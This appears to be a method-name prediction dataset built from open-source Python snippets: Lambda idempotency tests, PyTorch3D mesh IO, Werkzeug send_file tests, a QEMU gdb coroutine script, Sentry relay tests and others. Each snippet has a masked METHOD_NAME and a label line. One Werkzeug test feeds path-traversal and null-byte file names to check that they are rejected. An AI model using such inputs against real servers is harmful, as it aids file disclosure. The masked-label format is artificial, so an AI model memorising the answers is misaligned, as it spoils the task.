first_execution_response = first_execution["Payload"].read().decode("utf-8")
# the second execution should return the same response as the first execution
second_execution, _ = data_fetcher.get_lambda_response(
lambda_arn=METHOD_NAME,
payload=payload,
)
second_execution_response = second_execution["Payload"].read().decode("utf-8")
# THEN
# Function threads finished without exception AND
# first and second execution is the same
for function_thread in json.loads(first_execution_response):
assert function_thread["state"] == "FINISHED"
assert function_thread["exception"] is None
assert function_thread["output"] is not None
# we use set() here because we want to compare the elements regardless of their order in the array
assert set(first_execution_response) == set(second_execution_response)
@pytest.mark.xdist_group(name="idempotency")
def test_optional_idempotency_key(optional_idempotency_key_fn_arn: str):
# GIVEN two payloads where only one has the expected idempotency key
payload = json.dumps({"headers": {"X-Idempotency-Key": "here"}})
payload_without = json.dumps({"headers": {}})
# WHEN
# we make one request with an idempotency key
first_execution, _ = data_fetcher.get_lambda_response(lambda_arn=optional_idempotency_key_fn_arn, payload=payload)
first_execution_response = first_execution["Payload"].read().decode("utf-8")
# and two others without the idempotency key
second_execution, _ = data_fetcher.get_lambda_response(
lambda_arn=optional_idempotency_key_fn_arn,
payload=payload_without,
)
second_execution_response = second_execution["Payload"].read().decode("utf-8")
third_execution, _ = data_fetcher.get_lambda_response(
lambda_arn=optional_idempotency_key_fn_arn,
payload=payload_without,
)
third_execution_response = third_execution["Payload"].read().decode("utf-8")
# THEN
# we should treat 2nd and 3rd requests with NULL idempotency key as non-idempotent transactions
# that is, no cache, no calls to persistent store, etc.
assert first_execution_response != second_execution_response
assert first_execution_response != third_execution_response
assert second_execution_response != third_execution_response | null |
save mesh | # Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from collections import deque
from pathlib import Path
from typing import Deque, Optional, Union
from iopath.common.file_io import PathManager
from pytorch3d.common.datatypes import Device
from pytorch3d.structures import Meshes, Pointclouds
from .obj_io import MeshObjFormat
from .off_io import MeshOffFormat
from .pluggable_formats import MeshFormatInterpreter, PointcloudFormatInterpreter
from .ply_io import MeshPlyFormat, PointcloudPlyFormat
"""
This module has the master functions for loading and saving data.
The main usage is via the IO object, and its methods
`load_mesh`, `save_mesh`, `load_pointcloud` and `save_pointcloud`.
For example, to load a mesh you might do::
from pytorch3d.io import IO
mesh = IO().load_mesh("mymesh.obj")
and to save a point cloud you might do::
pcl = Pointclouds(...)
IO().save_pointcloud(pcl, "output_pointcloud.obj")
"""
class IO:
"""
This class is the interface to flexible loading and saving of meshes and point clouds.
In simple cases the user will just initialize an instance of this class as `IO()`
and then use its load and save functions. The arguments of the initializer are not
usually needed.
The user can add their own formats for saving and loading by passing their own objects
to the register_* functions.
Args:
include_default_formats: If False, the built-in file formats will not be available.
Then only user-registered formats can be used.
path_manager: Used to customize how paths given as strings are interpreted.
"""
def __init__(
self,
include_default_formats: bool = True,
path_manager: Optional[PathManager] = None,
) -> None:
if path_manager is None:
self.path_manager = PathManager()
else:
self.path_manager = path_manager
self.mesh_interpreters: Deque[MeshFormatInterpreter] = deque()
self.pointcloud_interpreters: Deque[PointcloudFormatInterpreter] = deque()
if include_default_formats:
self.register_default_formats()
def register_default_formats(self) -> None:
self.register_meshes_format(MeshObjFormat())
self.register_meshes_format(MeshOffFormat())
self.register_meshes_format(MeshPlyFormat())
self.register_pointcloud_format(PointcloudPlyFormat())
def register_meshes_format(self, interpreter: MeshFormatInterpreter) -> None:
"""
Register a new interpreter for a new mesh file format.
Args:
interpreter: the new interpreter to use, which must be an instance
of a class which inherits MeshFormatInterpreter.
"""
if not isinstance(interpreter, MeshFormatInterpreter):
raise ValueError("Invalid interpreter")
self.mesh_interpreters.appendleft(interpreter)
def register_pointcloud_format(
self, interpreter: PointcloudFormatInterpreter
) -> None:
"""
Register a new interpreter for a new point cloud file format.
Args:
interpreter: the new interpreter to use, which must be an instance
of a class which inherits PointcloudFormatInterpreter.
"""
if not isinstance(interpreter, PointcloudFormatInterpreter):
raise ValueError("Invalid interpreter")
self.pointcloud_interpreters.appendleft(interpreter)
def load_mesh(
self,
path: Union[str, Path],
include_textures: bool = True,
device: Device = "cpu",
**kwargs,
) -> Meshes:
"""
Attempt to load a mesh from the given file, using a registered format.
Materials are not returned. If you have a .obj file with materials
you might want to load them with the load_obj function instead.
Args:
path: file to read
include_textures: whether to try to load texture information
device: device on which to leave the data.
Returns:
new Meshes object containing one mesh.
"""
for mesh_interpreter in self.mesh_interpreters:
mesh = mesh_interpreter.read(
path,
include_textures=include_textures,
path_manager=self.path_manager,
device=device,
**kwargs,
)
if mesh is not None:
return mesh
raise ValueError(f"No mesh interpreter found to read {path}.")
def METHOD_NAME(
self,
data: Meshes,
path: Union[str, Path],
binary: Optional[bool] = None,
include_textures: bool = True,
**kwargs,
) -> None:
"""
Attempt to save a mesh to the given file, using a registered format.
Args:
data: a 1-element Meshes
path: file to write
binary: If there is a choice, whether to save in a binary format.
include_textures: If textures are present, whether to try to save
them.
"""
if not isinstance(data, Meshes):
raise ValueError("Meshes object expected.")
if len(data) != 1:
raise ValueError("Can only save a single mesh.")
for mesh_interpreter in self.mesh_interpreters:
success = mesh_interpreter.save(
data, path, path_manager=self.path_manager, binary=binary, **kwargs
)
if success:
return
raise ValueError(f"No mesh interpreter found to write to {path}.")
def load_pointcloud(
self, path: Union[str, Path], device: Device = "cpu", **kwargs
) -> Pointclouds:
"""
Attempt to load a point cloud from the given file, using a registered format.
Args:
path: file to read
device: Device (as str or torch.device) on which to load the data.
Returns:
new Pointclouds object containing one mesh.
"""
for pointcloud_interpreter in self.pointcloud_interpreters:
pointcloud = pointcloud_interpreter.read(
path, path_manager=self.path_manager, device=device, **kwargs
)
if pointcloud is not None:
return pointcloud
raise ValueError(f"No point cloud interpreter found to read {path}.")
def save_pointcloud(
self,
data: Pointclouds,
path: Union[str, Path],
binary: Optional[bool] = None,
**kwargs,
) -> None:
"""
Attempt to save a point cloud to the given file, using a registered format.
Args:
data: a 1-element Pointclouds
path: file to write
binary: If there is a choice, whether to save in a binary format.
"""
if not isinstance(data, Pointclouds):
raise ValueError("Pointclouds object expected.")
if len(data) != 1:
raise ValueError("Can only save a single point cloud.")
for pointcloud_interpreter in self.pointcloud_interpreters:
success = pointcloud_interpreter.save(
data, path, path_manager=self.path_manager, binary=binary, **kwargs
)
if success:
return
raise ValueError(f"No point cloud interpreter found to write to {path}.") | null |
test object mimetype from name | import datetime
import io
import pathlib
import pytest
from werkzeug.exceptions import NotFound
from werkzeug.http import http_date
from werkzeug.test import EnvironBuilder
from werkzeug.utils import send_file
from werkzeug.utils import send_from_directory
res_path = pathlib.Path(__file__).parent / "res"
html_path = res_path / "index.html"
txt_path = res_path / "test.txt"
environ = EnvironBuilder().get_environ()
@pytest.mark.parametrize("path", [html_path, str(html_path)])
def test_path(path):
rv = send_file(path, environ)
assert rv.mimetype == "text/html"
assert rv.direct_passthrough
rv.direct_passthrough = False
assert rv.data == html_path.read_bytes()
rv.close()
def test_x_sendfile():
rv = send_file(html_path, environ, use_x_sendfile=True)
assert rv.headers["x-sendfile"] == str(html_path)
assert rv.data == b""
rv.close()
def test_last_modified():
last_modified = datetime.datetime(1999, 1, 1, tzinfo=datetime.timezone.utc)
rv = send_file(txt_path, environ, last_modified=last_modified)
assert rv.last_modified == last_modified
rv.close()
@pytest.mark.parametrize(
"file_factory", [lambda: txt_path.open("rb"), lambda: io.BytesIO(b"test")]
)
def test_object(file_factory):
rv = send_file(file_factory(), environ, mimetype="text/plain", use_x_sendfile=True)
rv.direct_passthrough = False
assert rv.data
assert rv.mimetype == "text/plain"
assert "x-sendfile" not in rv.headers
rv.close()
def test_object_without_mimetype():
with pytest.raises(TypeError, match="detect the MIME type"):
send_file(io.BytesIO(b"test"), environ)
def METHOD_NAME():
rv = send_file(io.BytesIO(b"test"), environ, download_name="test.txt")
assert rv.mimetype == "text/plain"
rv.close()
@pytest.mark.parametrize(
"file_factory", [lambda: txt_path.open(), lambda: io.StringIO("test")]
)
def test_text_mode_fails(file_factory):
with file_factory() as f, pytest.raises(ValueError, match="binary mode"):
send_file(f, environ, mimetype="text/plain")
@pytest.mark.parametrize(
("as_attachment", "value"), [(False, "inline"), (True, "attachment")]
)
def test_disposition_name(as_attachment, value):
rv = send_file(txt_path, environ, as_attachment=as_attachment)
assert rv.headers["Content-Disposition"] == f"{value}; filename=test.txt"
rv.close()
def test_object_attachment_requires_name():
with pytest.raises(TypeError, match="attachment"):
send_file(
io.BytesIO(b"test"), environ, mimetype="text/plain", as_attachment=True
)
rv = send_file(
io.BytesIO(b"test"), environ, as_attachment=True, download_name="test.txt"
)
assert rv.headers["Content-Disposition"] == "attachment; filename=test.txt"
rv.close()
@pytest.mark.parametrize(
("name", "ascii", "utf8"),
(
("index.html", "index.html", None),
(
"Ñandú/pingüino.txt",
'"Nandu/pinguino.txt"',
"%C3%91and%C3%BA%EF%BC%8Fping%C3%BCino.txt",
),
# latin-1 isn't ascii, should be quoted
("Vögel.txt", "Vogel.txt", "V%C3%B6gel.txt"),
# ":/" are not safe in filename* value
("те:/ст", '":/"', "%D1%82%D0%B5%3A%2F%D1%81%D1%82"),
# general test of extended parameter (non-quoted)
("(тест.txt", '"(.txt"', "%28%D1%82%D0%B5%D1%81%D1%82.txt"),
("(test.txt", '"(test.txt"', None),
),
)
def test_non_ascii_name(name, ascii, utf8):
rv = send_file(html_path, environ, as_attachment=True, download_name=name)
rv.close()
content_disposition = rv.headers["Content-Disposition"]
assert f"filename={ascii}" in content_disposition
if utf8:
assert f"filename*=UTF-8''{utf8}" in content_disposition
else:
assert "filename*=UTF-8''" not in content_disposition
def test_no_cache_conditional_default():
rv = send_file(
txt_path,
EnvironBuilder(
headers={"If-Modified-Since": http_date(datetime.datetime(2020, 7, 12))}
).get_environ(),
last_modified=datetime.datetime(2020, 7, 11),
)
rv.close()
assert "no-cache" in rv.headers["Cache-Control"]
assert not rv.cache_control.public
assert not rv.cache_control.max_age
assert not rv.expires
assert rv.status_code == 304
@pytest.mark.parametrize(("value", "public"), [(0, False), (60, True)])
def test_max_age(value, public):
rv = send_file(txt_path, environ, max_age=value)
rv.close()
assert ("no-cache" in rv.headers["Cache-Control"]) != public
assert rv.cache_control.public == public
assert rv.cache_control.max_age == value
assert rv.expires
assert rv.status_code == 200
def test_etag():
rv = send_file(txt_path, environ)
rv.close()
assert rv.headers["ETag"].count("-") == 2
rv = send_file(txt_path, environ, etag=False)
rv.close()
assert "ETag" not in rv.headers
rv = send_file(txt_path, environ, etag="unique")
rv.close()
assert rv.headers["ETag"] == '"unique"'
@pytest.mark.parametrize("as_attachment", (True, False))
def test_content_encoding(as_attachment):
rv = send_file(
txt_path, environ, download_name="logo.svgz", as_attachment=as_attachment
)
rv.close()
assert rv.mimetype == "image/svg+xml"
assert rv.content_encoding == ("gzip" if not as_attachment else None)
@pytest.mark.parametrize(
("directory", "path"),
[(str(res_path), "test.txt"), (res_path, pathlib.Path("test.txt"))],
)
def test_from_directory(directory, path):
rv = send_from_directory(directory, path, environ)
rv.direct_passthrough = False
assert rv.data.strip() == b"FOUND"
rv.close()
@pytest.mark.parametrize("path", ["../res/test.txt", "nothing.txt", "null\x00.txt"])
def test_from_directory_not_found(path):
with pytest.raises(NotFound):
send_from_directory(res_path, path, environ)
def test_root_path(tmp_path):
# This is a private API, it should only be used by Flask.
d = tmp_path / "d"
d.mkdir()
(d / "test.txt").write_bytes(b"test")
rv = send_file("d/test.txt", environ, _root_path=tmp_path)
rv.direct_passthrough = False
assert rv.data == b"test"
rv.close()
rv = send_from_directory("d", "test.txt", environ, _root_path=tmp_path)
rv.direct_passthrough = False
assert rv.data == b"test"
rv.close()
def test_max_age_callable():
# This is a private API, it should only be used by Flask.
rv = send_file(txt_path, environ, max_age=lambda p: 10)
rv.close()
assert rv.cache_control.max_age == 10 | null |
test set proc title | from __future__ import unicode_literals
from textwrap import dedent
import pytest
def test_resolve_main(mocker):
from temboardui.toolkit.proctitle import compute_main_module_name
mod = mocker.Mock(__package__='my', __name__='module')
assert 'my.module' == compute_main_module_name(mod)
mod = mocker.Mock(
__package__='my', __name__='__main__', __file__='bla/module.py')
assert 'my.module' == compute_main_module_name(mod)
def test_fix_argv(mocker):
cmmn = mocker.patch(
'temboardui.toolkit.proctitle.compute_main_module_name',
autospec=True)
from temboardui.toolkit.pycompat import PY3
from temboardui.toolkit.proctitle import fix_argv
wanted = ['python', '-m', 'my.module']
cmmn.return_value = 'my.module'
if PY3:
input_ = ['python', '-m', '-m']
else:
input_ = ['python', '-m', '-c']
assert wanted == fix_argv(input_)
wanted = ['python', 'my-script.py']
assert wanted == fix_argv(['python', 'my-script.py'])
wanted = ['python', 'my-script.py', '-c', 'config']
assert wanted == fix_argv(['python', 'my-script.py', '-c', 'config'])
wanted = ['python', '-c', '__COMMAND_STRING__']
assert wanted == fix_argv(['python', '-c', '-c'])
def test_read_memory():
import ctypes
from temboardui.toolkit.proctitle import PY3, read_byte
data = ctypes.create_string_buffer(b'abcdef')
b = read_byte(ctypes.addressof(data))
wanted = 0x61 if PY3 else b'a'
assert wanted == b
def test_walk_bytes_backwards():
import ctypes
from temboardui.toolkit.proctitle import reverse_walk_memory
data = ctypes.create_string_buffer(b'abcdef')
address_of_nul = ctypes.addressof(data) + 6
iterator = reverse_walk_memory(address_of_nul, limit=7)
out = [b for _, b in iterator]
wanted = list(b'\x00fedcba')
assert wanted == out
def test_find_nulstrings():
from temboardui.toolkit.proctitle import reverse_find_nulstring
segment = b'\x00string0\x00string1\x00'
bytes_ = ((0xbebed0d0, b) for b in reversed(segment))
iterator = reverse_find_nulstring(bytes_)
out = [b for _, b in iterator]
wanted = ['string1', 'string0']
assert wanted == out
def test_find_stack_segment():
from temboardui.toolkit.proctitle import find_stack_segment_from_maps
lines = dedent("""\
55c7c8b2d000-55c7c8b35000 r-xp 00000000 fd:01 12582915 /bin/lol
55c7c9c82000-55c7c9ca3000 rw-p 00000000 00:00 0 [heap]
7feba95d1000-7feba9766000 r-xp 00000000 fd:01 2111422 /lib/x86_64-linux-gnu/libc-2.24.so
7feba9b95000-7feba9b96000 rw-p 00000000 00:00 0
7fff737c3000-7fff737e5000 rw-p 00000000 00:00 0 [stack]
7fff737f9000-7fff737fb000 r--p 00000000 00:00 0 [vvar]
""").splitlines(True) # noqa
start, end = find_stack_segment_from_maps(lines)
assert 0x7fff737c3000 == start
assert 0x7fff737e5000 == end
with pytest.raises(Exception):
find_stack_segment_from_maps(lines=[])
def test_find_argv_from_procmaps_mod(mocker):
mod = 'temboardui.toolkit.proctitle'
fss = mocker.patch(mod + '.find_stack_segment_from_maps', autospec=True)
mocker.patch(mod + '.reverse_walk_memory', autospec=True)
rfn = mocker.patch(mod + '.reverse_find_nulstring', autospec=True)
from temboardui.toolkit.proctitle import find_argv_memory_from_maps
fss.return_value = 0xdeb, 0xf1
rfn.return_value = reversed([
# This is the nul-terminated of string in stack segment.
(0xbad, 'garbadge'),
(0x1c1, 'python'),
(0xbad, '-m'),
(0xbad, 'temboard.script.tool'),
(0xbad, 'LC_ALL=fr_FR.UTF-8'),
(0xbad, '/usr/lib/python3.6/site-packages/...'),
])
argv = ['python', '-m', 'temboard.script.tool']
env = dict(LC_ALL='fr_FR.UTF-8')
_, address = find_argv_memory_from_maps(maps=None, argv=argv, environ=env)
assert 0x1c1 == address
def test_find_argv_from_procmaps_command_string(mocker):
mod = 'temboardui.toolkit.proctitle'
fss = mocker.patch(mod + '.find_stack_segment_from_maps', autospec=True)
mocker.patch(mod + '.reverse_walk_memory', autospec=True)
rfn = mocker.patch(mod + '.reverse_find_nulstring', autospec=True)
from temboardui.toolkit.proctitle import find_argv_memory_from_maps
fss.return_value = 0xdeb, 0xf1
rfn.return_value = reversed([
# This is the nul-terminated of string in stack segment.
(0xbad, 'garbadge'),
(0x1c1, 'python'),
(0xbad, '-c'),
(0xbad, 'from module import main; main()'),
(0xbad, 'LC_ALL=fr_FR.UTF-8'),
(0xbad, '/usr/lib/python3.6/site-packages/...'),
])
argv = ['python', '-c', '__COMMAND_STRING__']
env = dict(LC_ALL='fr_FR.UTF-8')
_, address = find_argv_memory_from_maps(maps=None, argv=argv, environ=env)
assert 0x1c1 == address
def METHOD_NAME(mocker):
memmove = mocker.patch(
'temboardui.toolkit.proctitle.ctypes.memmove', autospec=True)
from temboardui.toolkit.proctitle import ProcTitleManager
setproctitle = ProcTitleManager(prefix='prefix: ')
title = setproctitle('not initialized')
assert title is None
setproctitle.address = 0xd0d0bebe
setproctitle.size = 24
memmove.reset_mock()
title = setproctitle('title')
assert title.startswith(b'prefix: title\0')
assert 24 == len(title)
assert memmove.called is True | null |
bt jmpbuf | #
# GDB debugging support
#
# Copyright 2012 Red Hat, Inc. and/or its affiliates
#
# Authors:
# Avi Kivity <[email protected]>
#
# This work is licensed under the terms of the GNU GPL, version 2
# or later. See the COPYING file in the top-level directory.
import gdb
VOID_PTR = gdb.lookup_type('void').pointer()
def get_fs_base():
'''Fetch %fs base value using arch_prctl(ARCH_GET_FS). This is
pthread_self().'''
# %rsp - 120 is scratch space according to the SystemV ABI
old = gdb.parse_and_eval('*(uint64_t*)($rsp - 120)')
gdb.execute('call (int)arch_prctl(0x1003, $rsp - 120)', False, True)
fs_base = gdb.parse_and_eval('*(uint64_t*)($rsp - 120)')
gdb.execute('set *(uint64_t*)($rsp - 120) = %s' % old, False, True)
return fs_base
def pthread_self():
'''Fetch pthread_self() from the glibc start_thread function.'''
f = gdb.newest_frame()
while f.name() != 'start_thread':
f = f.older()
if f is None:
return get_fs_base()
try:
return f.read_var("arg")
except ValueError:
return get_fs_base()
def get_glibc_pointer_guard():
'''Fetch glibc pointer guard value'''
fs_base = pthread_self()
return gdb.parse_and_eval('*(uint64_t*)((uint64_t)%s + 0x30)' % fs_base)
def glibc_ptr_demangle(val, pointer_guard):
'''Undo effect of glibc's PTR_MANGLE()'''
return gdb.parse_and_eval('(((uint64_t)%s >> 0x11) | ((uint64_t)%s << (64 - 0x11))) ^ (uint64_t)%s' % (val, val, pointer_guard))
def get_jmpbuf_regs(jmpbuf):
JB_RBX = 0
JB_RBP = 1
JB_R12 = 2
JB_R13 = 3
JB_R14 = 4
JB_R15 = 5
JB_RSP = 6
JB_PC = 7
pointer_guard = get_glibc_pointer_guard()
return {'rbx': jmpbuf[JB_RBX],
'rbp': glibc_ptr_demangle(jmpbuf[JB_RBP], pointer_guard),
'rsp': glibc_ptr_demangle(jmpbuf[JB_RSP], pointer_guard),
'r12': jmpbuf[JB_R12],
'r13': jmpbuf[JB_R13],
'r14': jmpbuf[JB_R14],
'r15': jmpbuf[JB_R15],
'rip': glibc_ptr_demangle(jmpbuf[JB_PC], pointer_guard) }
def METHOD_NAME(jmpbuf):
'''Backtrace a jmpbuf'''
regs = get_jmpbuf_regs(jmpbuf)
old = dict()
# remember current stack frame and select the topmost
# so that register modifications don't wreck it
selected_frame = gdb.selected_frame()
gdb.newest_frame().select()
for i in regs:
old[i] = gdb.parse_and_eval('(uint64_t)$%s' % i)
for i in regs:
gdb.execute('set $%s = %s' % (i, regs[i]))
gdb.execute('bt')
for i in regs:
gdb.execute('set $%s = %s' % (i, old[i]))
selected_frame.select()
def co_cast(co):
return co.cast(gdb.lookup_type('CoroutineUContext').pointer())
def coroutine_to_jmpbuf(co):
coroutine_pointer = co_cast(co)
return coroutine_pointer['env']['__jmpbuf']
class CoroutineCommand(gdb.Command):
'''Display coroutine backtrace'''
def __init__(self):
gdb.Command.__init__(self, 'qemu coroutine', gdb.COMMAND_DATA,
gdb.COMPLETE_NONE)
def invoke(self, arg, from_tty):
argv = gdb.string_to_argv(arg)
if len(argv) != 1:
gdb.write('usage: qemu coroutine <coroutine-pointer>\n')
return
METHOD_NAME(coroutine_to_jmpbuf(gdb.parse_and_eval(argv[0])))
class CoroutineBt(gdb.Command):
'''Display backtrace including coroutine switches'''
def __init__(self):
gdb.Command.__init__(self, 'qemu bt', gdb.COMMAND_STACK,
gdb.COMPLETE_NONE)
def invoke(self, arg, from_tty):
gdb.execute("bt")
if gdb.parse_and_eval("qemu_in_coroutine()") == False:
return
co_ptr = gdb.parse_and_eval("qemu_coroutine_self()")
while True:
co = co_cast(co_ptr)
co_ptr = co["base"]["caller"]
if co_ptr == 0:
break
gdb.write("Coroutine at " + str(co_ptr) + ":\n")
METHOD_NAME(coroutine_to_jmpbuf(co_ptr))
class CoroutineSPFunction(gdb.Function):
def __init__(self):
gdb.Function.__init__(self, 'qemu_coroutine_sp')
def invoke(self, addr):
return get_jmpbuf_regs(coroutine_to_jmpbuf(addr))['rsp'].cast(VOID_PTR)
class CoroutinePCFunction(gdb.Function):
def __init__(self):
gdb.Function.__init__(self, 'qemu_coroutine_pc')
def invoke(self, addr):
return get_jmpbuf_regs(coroutine_to_jmpbuf(addr))['rip'].cast(VOID_PTR) | null |
test task writes config into cache | from unittest.mock import patch, sentinel
import pytest
from django.urls import reverse
from sentry.db.postgres.transactions import in_test_hide_transaction_boundary
from sentry.relay.config import ProjectConfig
from sentry.tasks.relay import build_project_config
from sentry.testutils.hybrid_cloud import simulated_transaction_watermarks
from sentry.testutils.pytest.fixtures import django_db_all
from sentry.utils import json
@pytest.fixture(autouse=True)
def disable_auto_on_commit():
simulated_transaction_watermarks.state["default"] = -1
with in_test_hide_transaction_boundary():
yield
@pytest.fixture
def call_endpoint(client, relay, private_key, default_projectkey):
def inner(full_config, public_keys=None, global_=False):
path = reverse("sentry-api-0-relay-projectconfigs") + "?version=4"
if public_keys is None:
public_keys = [str(default_projectkey.public_key)]
body = {"publicKeys": public_keys, "no_cache": False}
if full_config is not None:
body.update({"fullConfig": full_config})
if global_ is not None:
body.update({"global": global_})
raw_json, signature = private_key.pack(body)
resp = client.post(
path,
data=raw_json,
content_type="application/json",
HTTP_X_SENTRY_RELAY_ID=relay.relay_id,
HTTP_X_SENTRY_RELAY_SIGNATURE=signature,
)
return json.loads(resp.content), resp.status_code
return inner
@pytest.fixture
def projectconfig_cache_get_mock_config(monkeypatch):
monkeypatch.setattr(
"sentry.relay.projectconfig_cache.backend.get",
lambda *args, **kwargs: {"is_mock_config": True},
)
@pytest.fixture
def globalconfig_get_mock_config(monkeypatch):
monkeypatch.setattr(
"sentry.relay.globalconfig.get_global_config",
lambda *args, **kargs: {"global_mock_config": True},
)
@pytest.fixture
def single_mock_proj_cached(monkeypatch):
def cache_get(*args, **kwargs):
if args[0] == "must_exist":
return {"is_mock_config": True}
return None
monkeypatch.setattr("sentry.relay.projectconfig_cache.backend.get", cache_get)
@pytest.fixture
def projectconfig_debounced_cache(monkeypatch):
monkeypatch.setattr(
"sentry.relay.projectconfig_debounce_cache.backend.is_debounced",
lambda *args, **kargs: True,
)
@pytest.fixture
def project_config_get_mock(monkeypatch):
monkeypatch.setattr(
"sentry.relay.config.get_project_config",
lambda *args, **kwargs: ProjectConfig(sentinel.mock_project, is_mock_config=True),
)
@django_db_all
def test_return_full_config_if_in_cache(
call_endpoint,
default_projectkey,
projectconfig_cache_get_mock_config,
globalconfig_get_mock_config,
):
result, status_code = call_endpoint(full_config=True)
assert status_code == 200
assert result == {
"configs": {default_projectkey.public_key: {"is_mock_config": True}},
"pending": [],
}
@patch(
"sentry.api.endpoints.relay.project_configs.get_global_config",
lambda *args, **kargs: {"global_mock_config": True},
)
@django_db_all
def test_return_project_and_global_config(
call_endpoint,
default_projectkey,
projectconfig_cache_get_mock_config,
):
result, status_code = call_endpoint(full_config=True, global_=True)
assert status_code == 200
assert result == {
"configs": {default_projectkey.public_key: {"is_mock_config": True}},
"pending": [],
"global": {"global_mock_config": True},
}
@django_db_all
def test_proj_in_cache_and_another_pending(
call_endpoint, default_projectkey, single_mock_proj_cached, globalconfig_get_mock_config
):
result, status_code = call_endpoint(
full_config=True, public_keys=["must_exist", default_projectkey.public_key]
)
assert status_code == 200
assert result == {
"configs": {"must_exist": {"is_mock_config": True}},
"pending": [default_projectkey.public_key],
}
@patch("sentry.tasks.relay.build_project_config.delay")
@django_db_all
def test_enqueue_task_if_config_not_cached_not_queued(
schedule_mock, call_endpoint, default_projectkey, globalconfig_get_mock_config
):
result, status_code = call_endpoint(full_config=True)
assert status_code == 200
assert result == {"configs": {}, "pending": [default_projectkey.public_key]}
assert schedule_mock.call_count == 1
@patch("sentry.tasks.relay.build_project_config.delay")
@django_db_all
def test_debounce_task_if_proj_config_not_cached_already_enqueued(
task_mock,
call_endpoint,
default_projectkey,
projectconfig_debounced_cache,
globalconfig_get_mock_config,
):
result, status_code = call_endpoint(full_config=True)
assert status_code == 200
assert result == {"configs": {}, "pending": [default_projectkey.public_key]}
assert task_mock.call_count == 0
@patch("sentry.relay.projectconfig_cache.backend.set_many")
@django_db_all
def METHOD_NAME(
cache_set_many_mock, default_projectkey, project_config_get_mock, globalconfig_get_mock_config
):
build_project_config(
public_key=default_projectkey.public_key,
update_reason="test",
)
assert cache_set_many_mock.call_count == 1
# Using a tuple because that's the format `.args` uses
assert cache_set_many_mock.call_args.args == (
{default_projectkey.public_key: {"is_mock_config": True}},
) | null |
check deduplicate by node | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from typing import List, Dict, Tuple, cast
from nni.mutable.utils import uid
from nni.common.device import GPUDevice
from nni.nas.space import GraphModelSpace, Graph, Node
from .interface import AbstractOptimizer
from .logical_plan import AbstractLogicalNode, LogicalGraph, LogicalPlan, OriginNode
class DedupInputNode(AbstractLogicalNode):
"""
This is logical node representing the node for deduplication.
In assemble, just return one copy of the original node when multiple models are assembled.
These models will share the result of once calculation.
"""
def __init__(self, logical_graph: LogicalGraph, node_id: int,
nodes_to_dedup: List[OriginNode], _internal=False):
super().__init__(logical_graph, node_id,
"Dedup_" + nodes_to_dedup[0].name,
nodes_to_dedup[0].operation)
self.origin_nodes: List[OriginNode] = nodes_to_dedup.copy()
self.related_models = [_.original_graph.model for _ in self.origin_nodes]
def assemble(self, multi_model_placement: Dict[GraphModelSpace, GPUDevice]) -> Tuple[Node, GPUDevice]:
for node in self.origin_nodes:
if node.original_graph.model in multi_model_placement:
new_node = Node(node.original_graph, node.id,
f'M_{node.original_graph.model.model_id}_{node.name}',
node.operation)
return new_node, multi_model_placement[node.original_graph.model]
raise ValueError(f'DedupInputNode {self.name} does not contain nodes from multi_model')
def _fork_to(self, graph: Graph):
DedupInputNode(cast(LogicalGraph, graph), self.id, self.origin_nodes)._register()
def __repr__(self) -> str:
return f'DedupNode(id={self.id}, name={self.name}, \
len(nodes_to_dedup)={len(self.origin_nodes)}'
class DedupInputOptimizer(AbstractOptimizer):
def __init__(self) -> None:
pass
def _check_supported_evaluator(self, evaluator):
# NOTE(yuge): I think this is buggy. But I'm not sure whether I should fix it.
from nni.nas.execution.cgo.evaluator import MultiModelLightningModule
_supported_evaluators = (MultiModelLightningModule, )
return isinstance(evaluator, _supported_evaluators)
def METHOD_NAME(self, root_node, node_to_check):
if root_node == node_to_check:
return True
if root_node.operation.type == '_inputs' and \
node_to_check.operation.type == '_inputs' and \
isinstance(root_node, OriginNode) and \
isinstance(node_to_check, OriginNode):
if self._check_supported_evaluator(root_node.original_graph.model.evaluator):
return False
if root_node.original_graph.model.evaluator == node_to_check.original_graph.model.evaluator:
return True
else:
return False
else:
return False
def convert(self, logical_plan: LogicalPlan) -> None:
nodes_to_skip = set()
while True: # repeat until the logical_graph converges
input_nodes = logical_plan.logical_graph.get_nodes_by_type("_inputs")
# _PseudoOperation(type_name="_inputs"))
root_node = None
for node in input_nodes:
if node in nodes_to_skip:
continue
root_node = node
break
if root_node is None:
break # end of convert
else:
nodes_to_dedup = []
for node in input_nodes:
if node in nodes_to_skip:
continue
if self.METHOD_NAME(root_node, node):
nodes_to_dedup.append(node)
assert(len(nodes_to_dedup) >= 1)
if len(nodes_to_dedup) == 1:
assert(nodes_to_dedup[0] == root_node)
nodes_to_skip.add(root_node)
else:
dedup_node = DedupInputNode(logical_plan.logical_graph, uid(), nodes_to_dedup)._register()
for edge in logical_plan.logical_graph.edges:
if edge.head in nodes_to_dedup:
edge.head = dedup_node
if edge.tail in nodes_to_dedup:
edge.tail = dedup_node
for node in nodes_to_dedup:
node.remove() | null |
minigraph facts | import logging
import pytest
from ipaddress import ip_interface
from constants import ENI, VM_VNI, VNET1_VNI, VNET2_VNI, REMOTE_CA_IP, LOCAL_CA_IP, REMOTE_ENI_MAC,\
LOCAL_ENI_MAC, REMOTE_CA_PREFIX, LOOPBACK_IP, DUT_MAC, LOCAL_PA_IP, LOCAL_PTF_INTF, LOCAL_PTF_MAC,\
REMOTE_PA_IP, REMOTE_PTF_INTF, REMOTE_PTF_MAC, REMOTE_PA_PREFIX, VNET1_NAME, VNET2_NAME, ROUTING_ACTION, \
ROUTING_ACTION_TYPE, LOOKUP_OVERLAY_IP
from dash_utils import render_template_to_host, apply_swssconfig_file
logger = logging.getLogger(__name__)
def pytest_addoption(parser):
"""
Adds pytest options that are used by DASH tests
"""
parser.addoption(
"--skip_config",
action="store_true",
help="Don't apply configurations on DUT"
)
parser.addoption(
"--config_only",
action="store_true",
help="Apply new configurations on DUT without running tests"
)
parser.addoption(
"--skip_cleanup",
action="store_true",
help="Skip config cleanup after test"
)
@pytest.fixture(scope="module")
def config_only(request):
return request.config.getoption("--config_only")
@pytest.fixture(scope="module")
def skip_config(request):
return request.config.getoption("--skip_config")
@pytest.fixture(scope="module")
def skip_cleanup(request):
return request.config.getoption("--skip_cleanup")
@pytest.fixture(scope="module")
def config_facts(duthost):
return duthost.config_facts(host=duthost.hostname, source="running")['ansible_facts']
@pytest.fixture(scope="module")
def METHOD_NAME(duthosts, rand_one_dut_hostname, tbinfo):
"""
Fixture to get minigraph facts
Args:
duthost: DUT host object
Returns:
